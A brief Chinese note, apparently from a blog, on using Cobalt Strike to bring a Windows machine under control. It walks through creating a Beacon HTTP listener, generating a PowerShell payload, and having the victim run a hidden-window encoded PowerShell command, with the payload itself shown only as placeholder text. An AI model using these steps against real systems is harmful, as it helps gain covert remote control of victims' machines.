【笔记】CobaltStrike通过PowerShell命令实现Windows上线

前言

CobaltStrike通过PowerShell命令实现Windows上线

攻击者添加监听器

  • CobaltStrike->监听器->添加

  • 创建监听器->保存

名字:自定义
Payload:Beacon HTTP
HTTP地址:CobaltStrike服务端IP
HTTP地址(Stager):CobaltStrike服务端IP

  • 反向连接监听器创建成功后会自动在CobaltStrike服务端监听端口,等待受害者上线

攻击者生成PowerShell命令

  • 攻击->生成后门->Payload生成器

  • 监听器选择上一步骤创建的监听器,输出格式选择PowerShell Command,根据需要在x64勾选或取消勾选使用x64 payload->生成

  • 得到payload.txt文件

受害者执行PowerShell命令

payload.txt
1
powershell -nop -w hidden -encodedcommand xxxxxxxx

完成